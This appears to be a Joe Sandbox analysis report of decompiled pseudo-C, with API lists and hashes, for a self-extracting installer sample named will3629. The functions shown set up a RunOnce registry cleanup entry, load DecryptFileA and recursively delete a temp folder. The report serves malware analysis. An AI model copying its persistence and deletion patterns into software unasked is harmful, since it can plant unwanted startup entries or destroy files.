                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                • API String ID: 383838535-2835489207
                                                • Opcode ID: d8193b79d3d767b7c0ac25cb10ac59856e1ef08ea9958a0c7c55872152bdc4a1
                                                • Instruction ID: d34be2a04a5be22c62e7e629cf9371019ee00d58cc75d9b6766e6049ffd2c362
                                                • Opcode Fuzzy Hash: d8193b79d3d767b7c0ac25cb10ac59856e1ef08ea9958a0c7c55872152bdc4a1
                                                • Instruction Fuzzy Hash: E4A11970B002186BEB20DB24CC45FFA77A9EB57310F16479DE556E32C2DBB49D868B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 450 ac2f1d-ac2f3d 451 ac2f6c-ac2f73 call ac5164 450->451 452 ac2f3f-ac2f46 450->452 460 ac2f79-ac2f80 call ac55a0 451->460 461 ac3041 451->461 454 ac2f5f-ac2f66 call ac3a3f 452->454 455 ac2f48 call ac51e5 452->455 454->451 454->461 462 ac2f4d-ac2f4f 455->462 460->461 469 ac2f86-ac2fbe GetSystemDirectoryA call ac658a LoadLibraryA 460->469 465 ac3043-ac3053 call ac6ce0 461->465 462->461 463 ac2f55-ac2f5d 462->463 463->451 463->454 472 ac2ff7-ac3004 FreeLibrary 469->472 473 ac2fc0-ac2fd4 GetProcAddress 469->473 474 ac3006-ac300c 472->474 475 ac3017-ac3024 SetCurrentDirectoryA 472->475 473->472 476 ac2fd6-ac2fee DecryptFileA 473->476 474->475 477 ac300e call ac621e 474->477 478 ac3054-ac305a 475->478 479 ac3026-ac303c call ac44b9 call ac6285 475->479 476->472 485 ac2ff0-ac2ff5 476->485 489 ac3013-ac3015 477->489 481 ac305c call ac3b26 478->481 482 ac3065-ac306c 478->482 479->461 491 ac3061-ac3063 481->491 487 ac307c-ac3089 482->487 488 ac306e-ac3075 call ac256d 482->488 485->472 493 ac308b-ac3091 487->493 494 ac30a1-ac30a9 487->494 498 ac307a 488->498 489->461 489->475 491->461 491->482 493->494 499 ac3093 call ac3ba2 493->499 496 ac30ab-ac30ad 494->496 497 ac30b4-ac30b7 494->497 496->497 501 ac30af call ac4169 496->501 497->465 498->487 504 ac3098-ac309a 499->504 501->497 504->461 505 ac309c 504->505 505->494
                                                C-Code - Quality: 82%
                                                			E00AC2F1D(void* __ecx, int __edx) {
                                                				signed int _v8;
                                                				char _v272;
                                                				_Unknown_base(*)()* _v276;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t9;
                                                				void* _t11;
                                                				struct HWND__* _t12;
                                                				void* _t14;
                                                				int _t21;
                                                				signed int _t22;
                                                				signed int _t25;
                                                				intOrPtr* _t26;
                                                				signed int _t27;
                                                				void* _t30;
                                                				_Unknown_base(*)()* _t31;
                                                				void* _t34;
                                                				struct HINSTANCE__* _t36;
                                                				intOrPtr _t41;
                                                				intOrPtr* _t44;
                                                				signed int _t46;
                                                				int _t47;
                                                				void* _t58;
                                                				void* _t59;
                                                
                                                				_t43 = __edx;
                                                				_t9 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t9 ^ _t46;
                                                				if( *0xac8a38 != 0) {
                                                					L5:
                                                					_t11 = E00AC5164(_t52);
                                                					_t53 = _t11;
                                                					if(_t11 == 0) {
                                                						L16:
                                                						_t12 = 0;
                                                						L17:
                                                						return E00AC6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                					}
                                                					_t14 = E00AC55A0(_t53); // executed
                                                					if(_t14 == 0) {
                                                						goto L16;
                                                					} else {
                                                						_t45 = 0x105;
                                                						GetSystemDirectoryA( &_v272, 0x105);
                                                						_t43 = 0x105;
                                                						_t40 =  &_v272;
                                                						E00AC658A( &_v272, 0x105, "advapi32.dll");
                                                						_t36 = LoadLibraryA( &_v272);
                                                						_t44 = 0;
                                                						if(_t36 != 0) {
                                                							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                							_v276 = _t31;
                                                							if(_t31 != 0) {
                                                								_t45 = _t47;
                                                								_t40 = _t31;
                                                								 *0xaca288("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                								_v276();
                                                								if(_t47 != _t47) {
                                                									_t40 = 4;
                                                									asm("int 0x29");
                                                								}
                                                							}
                                                						}
                                                						FreeLibrary(_t36);
                                                						_t58 =  *0xac8a24 - _t44; // 0x0
                                                						if(_t58 != 0) {
                                                							L14:
                                                							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                							if(_t21 != 0) {
                                                								__eflags =  *0xac8a2c - _t44; // 0x0
                                                								if(__eflags != 0) {
                                                									L20:
                                                									__eflags =  *0xac8d48 & 0x000000c0;
                                                									if(( *0xac8d48 & 0x000000c0) == 0) {
                                                										_t41 =  *0xac9a40; // 0x3, executed
                                                										_t26 = E00AC256D(_t41); // executed
                                                										_t44 = _t26;
                                                									}
                                                									_t22 =  *0xac8a24; // 0x0
                                                									 *0xac9a44 = _t44;
                                                									__eflags = _t22;
                                                									if(_t22 != 0) {
                                                										L26:
                                                										__eflags =  *0xac8a38;
                                                										if( *0xac8a38 == 0) {
                                                											__eflags = _t22;
                                                											if(__eflags == 0) {
                                                												E00AC4169(__eflags);
                                                											}
                                                										}
                                                										_t12 = 1;
                                                										goto L17;
                                                									} else {
                                                										__eflags =  *0xac9a30 - _t22; // 0x0
                                                										if(__eflags != 0) {
                                                											goto L26;
                                                										}
                                                										_t25 = E00AC3BA2(); // executed
                                                										__eflags = _t25;
                                                										if(_t25 == 0) {
                                                											goto L16;
                                                										}
                                                										_t22 =  *0xac8a24; // 0x0
                                                										goto L26;
                                                									}
                                                								}
                                                								_t27 = E00AC3B26(_t40, _t44);
                                                								__eflags = _t27;
                                                								if(_t27 == 0) {
                                                									goto L16;
                                                								}
                                                								goto L20;
                                                							}
                                                							_t43 = 0x4bc;
                                                							E00AC44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                							 *0xac9124 = E00AC6285();
                                                							goto L16;
                                                						}
                                                						_t59 =  *0xac9a30 - _t44; // 0x0
                                                						if(_t59 != 0) {
                                                							goto L14;
                                                						}
                                                						_t30 = E00AC621E(); // executed
                                                						if(_t30 == 0) {
                                                							goto L16;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                				_t49 =  *0xac8a24;
                                                				if( *0xac8a24 != 0) {
                                                					L4:
                                                					_t34 = E00AC3A3F(_t51);
                                                					_t52 = _t34;
                                                					if(_t34 == 0) {
                                                						goto L16;
                                                					}
                                                					goto L5;
                                                				}
                                                				if(E00AC51E5(_t49) == 0) {
                                                					goto L16;
                                                				}
                                                				_t51 =  *0xac8a38;
                                                				if( *0xac8a38 != 0) {
                                                					goto L5;
                                                				}
                                                				goto L4;
                                                			}




























                                                0x00ac2f1d
                                                0x00ac2f28
                                                0x00ac2f2f
                                                0x00ac2f3d
                                                0x00ac2f6c
                                                0x00ac2f6c
                                                0x00ac2f71
                                                0x00ac2f73
                                                0x00ac3041
                                                0x00ac3041
                                                0x00ac3043
                                                0x00ac3053
                                                0x00ac3053
                                                0x00ac2f79
                                                0x00ac2f80
                                                0x00000000
                                                0x00ac2f86
                                                0x00ac2f86
                                                0x00ac2f93
                                                0x00ac2f9e
                                                0x00ac2fa0
                                                0x00ac2fa6
                                                0x00ac2fb8
                                                0x00ac2fba
                                                0x00ac2fbe
                                                0x00ac2fc6
                                                0x00ac2fcc
                                                0x00ac2fd4
                                                0x00ac2fd6
                                                0x00ac2fd8
                                                0x00ac2fe0
                                                0x00ac2fe6
                                                0x00ac2fee
                                                0x00ac2ff0
                                                0x00ac2ff5
                                                0x00ac2ff5
                                                0x00ac2fee
                                                0x00ac2fd4
                                                0x00ac2ff8
                                                0x00ac2ffe
                                                0x00ac3004
                                                0x00ac3017
                                                0x00ac301c
                                                0x00ac3024
                                                0x00ac3054
                                                0x00ac305a
                                                0x00ac3065
                                                0x00ac3065
                                                0x00ac306c
                                                0x00ac306e
                                                0x00ac3075
                                                0x00ac307a
                                                0x00ac307a
                                                0x00ac307c
                                                0x00ac3081
                                                0x00ac3087
                                                0x00ac3089
                                                0x00ac30a1
                                                0x00ac30a1
                                                0x00ac30a9
                                                0x00ac30ab
                                                0x00ac30ad
                                                0x00ac30af
                                                0x00ac30af
                                                0x00ac30ad
                                                0x00ac30b6
                                                0x00000000
                                                0x00ac308b
                                                0x00ac308b
                                                0x00ac3091
                                                0x00000000
                                                0x00000000
                                                0x00ac3093
                                                0x00ac3098
                                                0x00ac309a
                                                0x00000000
                                                0x00000000
                                                0x00ac309c
                                                0x00000000
                                                0x00ac309c
                                                0x00ac3089
                                                0x00ac305c
                                                0x00ac3061
                                                0x00ac3063
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac3063
                                                0x00ac302b
                                                0x00ac3032
                                                0x00ac303c
                                                0x00000000
                                                0x00ac303c
                                                0x00ac3006
                                                0x00ac300c
                                                0x00000000
                                                0x00000000
                                                0x00ac300e
                                                0x00ac3015
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac3015
                                                0x00ac2f80
                                                0x00ac2f3f
                                                0x00ac2f46
                                                0x00ac2f5f
                                                0x00ac2f5f
                                                0x00ac2f64
                                                0x00ac2f66
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac2f66
                                                0x00ac2f4f
                                                0x00000000
                                                0x00000000
                                                0x00ac2f55
                                                0x00ac2f5d
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 00AC2F93
                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00AC2FB2
                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00AC2FC6
                                                • DecryptFileA.ADVAPI32 ref: 00AC2FE6
                                                • FreeLibrary.KERNEL32(00000000), ref: 00AC2FF8
                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC301C
                                                  • Part of subcall function 00AC51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00AC2F4D,?,00000002,00000000), ref: 00AC5201
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                • API String ID: 2126469477-2196669084
                                                • Opcode ID: 096f08af24caee4c65a44f7132f6c956ad66f36e7d801ef36e96f3ca78f8c80f
                                                • Instruction ID: 5023730a9468b4f6bcb863b02aae6d0dab51450af8dc1d7141eb1324ce9bfd86
                                                • Opcode Fuzzy Hash: 096f08af24caee4c65a44f7132f6c956ad66f36e7d801ef36e96f3ca78f8c80f
                                                • Instruction Fuzzy Hash: B641B733A002099ADF30EBB59D49F6733E8EB54794F07416DA941C2192EF74CE82CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 86%
                                                			E00AC2390(CHAR* __ecx) {
                                                				signed int _v8;
                                                				char _v276;
                                                				char _v280;
                                                				char _v284;
                                                				struct _WIN32_FIND_DATAA _v596;
                                                				struct _WIN32_FIND_DATAA _v604;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t21;
                                                				int _t36;
                                                				void* _t46;
                                                				void* _t62;
                                                				void* _t63;
                                                				CHAR* _t65;
                                                				void* _t66;
                                                				signed int _t67;
                                                				signed int _t69;
                                                
                                                				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                				_t21 =  *0xac8004; // 0xc32e3ded
                                                				_t22 = _t21 ^ _t69;
                                                				_v8 = _t21 ^ _t69;
                                                				_t65 = __ecx;
                                                				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                					L10:
                                                					_pop(_t62);
                                                					_pop(_t66);
                                                					_pop(_t46);
                                                					return E00AC6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                				} else {
                                                					E00AC1680( &_v276, 0x104, __ecx);
                                                					_t58 = 0x104;
                                                					E00AC16B3( &_v280, 0x104, "*");
                                                					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                					_t63 = _t22;
                                                					if(_t63 == 0xffffffff) {
                                                						goto L10;
                                                					} else {
                                                						goto L3;
                                                					}
                                                					do {
                                                						L3:
                                                						_t58 = 0x104;
                                                						E00AC1680( &_v276, 0x104, _t65);
                                                						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                							_t58 = 0x104;
                                                							E00AC16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                							SetFileAttributesA( &_v280, 0x80);
                                                							DeleteFileA( &_v280);
                                                						} else {
                                                							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                								E00AC16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                								_t58 = 0x104;
                                                								E00AC658A( &_v280, 0x104, 0xac1140);
                                                								E00AC2390( &_v284);
                                                							}
                                                						}
                                                						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                					} while (_t36 != 0);
                                                					FindClose(_t63); // executed
                                                					_t22 = RemoveDirectoryA(_t65); // executed
                                                					goto L10;
                                                				}
                                                			}





















                                                0x00ac2398
                                                0x00ac239e
                                                0x00ac23a3
                                                0x00ac23a5
                                                0x00ac23ae
                                                0x00ac23b3
                                                0x00ac24cb
                                                0x00ac24d2
                                                0x00ac24d3
                                                0x00ac24d4
                                                0x00ac24df
                                                0x00ac23c2
                                                0x00ac23d1
                                                0x00ac23db
                                                0x00ac23e4
                                                0x00ac23f6
                                                0x00ac23fc
                                                0x00ac2401
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac2407
                                                0x00ac2407
                                                0x00ac2408
                                                0x00ac2411
                                                0x00ac241f
                                                0x00ac247a
                                                0x00ac2483
                                                0x00ac2495
                                                0x00ac24a3
                                                0x00ac2421
                                                0x00ac242f
                                                0x00ac2453
                                                0x00ac245d
                                                0x00ac2466
                                                0x00ac2472
                                                0x00ac2472
                                                0x00ac242f
                                                0x00ac24af
                                                0x00ac24b5
                                                0x00ac24be
                                                0x00ac24c5
                                                0x00000000
                                                0x00ac24c5

                                                APIs
                                                • FindFirstFileA.KERNELBASE(?,00AC8A3A,00AC11F4,00AC8A3A,00000000,?,?), ref: 00AC23F6
                                                • lstrcmpA.KERNEL32(?,00AC11F8), ref: 00AC2427
                                                • lstrcmpA.KERNEL32(?,00AC11FC), ref: 00AC243B
                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00AC2495
                                                • DeleteFileA.KERNEL32(?), ref: 00AC24A3
                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00AC24AF
                                                • FindClose.KERNELBASE(00000000), ref: 00AC24BE
                                                • RemoveDirectoryA.KERNELBASE(00AC8A3A), ref: 00AC24C5
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                • String ID:
                                                • API String ID: 836429354-0
                                                • Opcode ID: 569da63927736aafafc586e1866df4c370f108e9387371f5f4b215af8866669f
                                                • Instruction ID: fa2e2aa64010a3b6a347f90be2d59387ea77d3de28a9eac51535829d47f99ab7
                                                • Opcode Fuzzy Hash: 569da63927736aafafc586e1866df4c370f108e9387371f5f4b215af8866669f
                                                • Instruction Fuzzy Hash: 4831A132704744ABC320EBA4CE89FEB73ECBBC5345F06492DB59586291EB389909C752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E00AC2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				long _t4;
                                                				void* _t6;
                                                				intOrPtr _t7;
                                                				void* _t9;
                                                				struct HINSTANCE__* _t12;
                                                				intOrPtr* _t17;
                                                				signed char _t19;
                                                				intOrPtr* _t21;
                                                				void* _t22;
                                                				void* _t24;
                                                				intOrPtr _t32;
                                                
                                                				_t4 = GetVersion();
                                                				if(_t4 >= 0 && _t4 >= 6) {
                                                					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                					if(_t12 != 0) {
                                                						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                						if(_t21 != 0) {
                                                							_t17 = _t21;
                                                							 *0xaca288(0, 1, 0, 0);
                                                							 *_t21();
                                                							_t29 = _t24 - _t24;
                                                							if(_t24 != _t24) {
                                                								_t17 = 4;
                                                								asm("int 0x29");
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_t20 = _a12;
                                                				_t18 = _a4;
                                                				 *0xac9124 = 0;
                                                				if(E00AC2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                					_t9 = E00AC2F1D(_t18, _t20); // executed
                                                					_t22 = _t9; // executed
                                                					E00AC52B6(0, _t18, _t21, _t22); // executed
                                                					if(_t22 != 0) {
                                                						_t32 =  *0xac8a3a; // 0x0
                                                						if(_t32 == 0) {
                                                							_t19 =  *0xac9a2c; // 0x0
                                                							if((_t19 & 0x00000001) != 0) {
                                                								E00AC1F90(_t19, _t21, _t22);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_t6 =  *0xac8588; // 0x0
                                                				if(_t6 != 0) {
                                                					CloseHandle(_t6);
                                                				}
                                                				_t7 =  *0xac9124; // 0x80070002
                                                				return _t7;
                                                			}


















                                                0x00ac2c03
                                                0x00ac2c0d
                                                0x00ac2c18
                                                0x00ac2c20
                                                0x00ac2c2e
                                                0x00ac2c32
                                                0x00ac2c36
                                                0x00ac2c3d
                                                0x00ac2c43
                                                0x00ac2c45
                                                0x00ac2c47
                                                0x00ac2c49
                                                0x00ac2c4e
                                                0x00ac2c4e
                                                0x00ac2c47
                                                0x00ac2c32
                                                0x00ac2c20
                                                0x00ac2c50
                                                0x00ac2c54
                                                0x00ac2c57
                                                0x00ac2c64
                                                0x00ac2c66
                                                0x00ac2c6b
                                                0x00ac2c6d
                                                0x00ac2c74
                                                0x00ac2c76
                                                0x00ac2c7c
                                                0x00ac2c7e
                                                0x00ac2c87
                                                0x00ac2c89
                                                0x00ac2c89
                                                0x00ac2c87
                                                0x00ac2c7c
                                                0x00ac2c74
                                                0x00ac2c8e
                                                0x00ac2c95
                                                0x00ac2c98
                                                0x00ac2c98
                                                0x00ac2c9e
                                                0x00ac2ca7

                                                APIs
                                                • GetVersion.KERNEL32(?,00000002,00000000,?,00AC6BB0,00AC0000,00000000,00000002,0000000A), ref: 00AC2C03
                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00AC6BB0,00AC0000,00000000,00000002,0000000A), ref: 00AC2C18
                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00AC2C28
                                                • CloseHandle.KERNEL32(00000000,?,?,00AC6BB0,00AC0000,00000000,00000002,0000000A), ref: 00AC2C98
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                • String ID: HeapSetInformation$Kernel32.dll
                                                • API String ID: 62482547-3460614246
                                                • Opcode ID: bce71e99a48174c10c9f154ef3546d808f03261c0ec90ed626be6b45b19b2c6d
                                                • Instruction ID: e51b32318f67e0f003aff7b02d009ae68151153bcac2bbb1945d9efefc1e8351
                                                • Opcode Fuzzy Hash: bce71e99a48174c10c9f154ef3546d808f03261c0ec90ed626be6b45b19b2c6d
                                                • Instruction Fuzzy Hash: 6E11E5713043096BDB20ABF5AD89F6F3799AB84395B0B012DF906D7251DE31DC4387A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC6F40() {
                                                
                                                				SetUnhandledExceptionFilter(E00AC6EF0); // executed
                                                				return 0;
                                                			}



                                                0x00ac6f45
                                                0x00ac6f4d

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00AC6F45
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 114e3d2d8d3a32f0c96cc6b87cb7c49f4dcc936fd1e8ab893490cad9d19afa7d
                                                • Instruction ID: 264ec81e5749b06f2d0f5c4e55a9546131cdf81a581c848d4ed611e8d23cb105
                                                • Opcode Fuzzy Hash: 114e3d2d8d3a32f0c96cc6b87cb7c49f4dcc936fd1e8ab893490cad9d19afa7d
                                                • Instruction Fuzzy Hash: 639002742511049797109BB09D19D2575916A5D606B875965A011C4494DB6040415513
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 93%
                                                			E00AC202A(struct HINSTANCE__* __edx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				void* _v532;
                                                				int _v536;
                                                				int _v540;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t28;
                                                				long _t36;
                                                				long _t41;
                                                				struct HINSTANCE__* _t46;
                                                				intOrPtr _t49;
                                                				intOrPtr _t50;
                                                				CHAR* _t54;
                                                				void _t56;
                                                				signed int _t66;
                                                				intOrPtr* _t72;
                                                				void* _t73;
                                                				void* _t75;
                                                				void* _t80;
                                                				intOrPtr* _t81;
                                                				void* _t86;
                                                				void* _t87;
                                                				void* _t90;
                                                				_Unknown_base(*)()* _t91;
                                                				signed int _t93;
                                                				void* _t94;
                                                				void* _t95;
                                                
                                                				_t79 = __edx;
                                                				_t28 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t28 ^ _t93;
                                                				_t84 = 0x104;
                                                				memset( &_v268, 0, 0x104);
                                                				memset( &_v528, 0, 0x104);
                                                				_t95 = _t94 + 0x18;
                                                				_t66 = 0;
                                                				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                				if(_t36 != 0) {
                                                					L24:
                                                					return E00AC6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                				}
                                                				_push(_t86);
                                                				_t87 = 0;
                                                				while(1) {
                                                					E00AC171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                					_t95 = _t95 + 0x10;
                                                					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                					if(_t41 != 0) {
                                                						break;
                                                					}
                                                					_t87 = _t87 + 1;
                                                					if(_t87 < 0xc8) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				if(_t87 != 0xc8) {
                                                					GetSystemDirectoryA( &_v528, _t84);
                                                					_t79 = _t84;
                                                					E00AC658A( &_v528, _t84, "advpack.dll");
                                                					_t46 = LoadLibraryA( &_v528); // executed
                                                					_t84 = _t46;
                                                					if(_t84 == 0) {
                                                						L10:
                                                						if(GetModuleFileNameA( *0xac9a3c,  &_v268, 0x104) == 0) {
                                                							L17:
                                                							_t36 = RegCloseKey(_v532);
                                                							L23:
                                                							_pop(_t86);
                                                							goto L24;
                                                						}
                                                						L11:
                                                						_t72 =  &_v268;
                                                						_t80 = _t72 + 1;
                                                						do {
                                                							_t49 =  *_t72;
                                                							_t72 = _t72 + 1;
                                                						} while (_t49 != 0);
                                                						_t73 = _t72 - _t80;
                                                						_t81 = 0xac91e4;
                                                						do {
                                                							_t50 =  *_t81;
                                                							_t81 = _t81 + 1;
                                                						} while (_t50 != 0);
                                                						_t84 = _t73 + 0x50 + _t81 - 0xac91e5;
                                                						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xac91e5);
                                                						if(_t90 != 0) {
                                                							 *0xac8580 = _t66 ^ 0x00000001;
                                                							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                							if(_t66 == 0) {
                                                								_t54 = "%s /D:%s";
                                                							}
                                                							_push("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                							E00AC171E(_t90, _t84, _t54,  &_v268);
                                                							_t75 = _t90;
                                                							_t23 = _t75 + 1; // 0x1
                                                							_t79 = _t23;
                                                							do {
                                                								_t56 =  *_t75;
                                                								_t75 = _t75 + 1;
                                                							} while (_t56 != 0);
                                                							_t24 = _t75 - _t79 + 1; // 0x2
                                                							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                							RegCloseKey(_v532); // executed
                                                							_t36 = LocalFree(_t90);
                                                							goto L23;
                                                						}
                                                						_t79 = 0x4b5;
                                                						E00AC44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                						goto L17;
                                                					}
                                                					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                					_t66 = 0 | _t91 != 0x00000000;
                                                					FreeLibrary(_t84); // executed
                                                					if(_t91 == 0) {
                                                						goto L10;
                                                					}
                                                					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                						E00AC658A( &_v268, 0x104, 0xac1140);
                                                					}
                                                					goto L11;
                                                				}
                                                				_t36 = RegCloseKey(_v532);
                                                				 *0xac8530 = _t66;
                                                				goto L23;
                                                			}

































                                                0x00ac202a
                                                0x00ac2035
                                                0x00ac203c
                                                0x00ac2041
                                                0x00ac2050
                                                0x00ac205f
                                                0x00ac2064
                                                0x00ac206f
                                                0x00ac208c
                                                0x00ac2094
                                                0x00ac2257
                                                0x00ac2266
                                                0x00ac2266
                                                0x00ac209a
                                                0x00ac209b
                                                0x00ac209d
                                                0x00ac20aa
                                                0x00ac20af
                                                0x00ac20c9
                                                0x00ac20d1
                                                0x00000000
                                                0x00000000
                                                0x00ac20d3
                                                0x00ac20da
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac20da
                                                0x00ac20e2
                                                0x00ac2103
                                                0x00ac210e
                                                0x00ac2116
                                                0x00ac2122
                                                0x00ac2128
                                                0x00ac212c
                                                0x00ac2179
                                                0x00ac2194
                                                0x00ac21de
                                                0x00ac21e4
                                                0x00ac2256
                                                0x00ac2256
                                                0x00000000
                                                0x00ac2256
                                                0x00ac2196
                                                0x00ac2196
                                                0x00ac219c
                                                0x00ac219f
                                                0x00ac219f
                                                0x00ac21a1
                                                0x00ac21a2
                                                0x00ac21a6
                                                0x00ac21a8
                                                0x00ac21b0
                                                0x00ac21b0
                                                0x00ac21b2
                                                0x00ac21b3
                                                0x00ac21bc
                                                0x00ac21c7
                                                0x00ac21cb
                                                0x00ac21f1
                                                0x00ac21f6
                                                0x00ac21fd
                                                0x00ac21ff
                                                0x00ac21ff
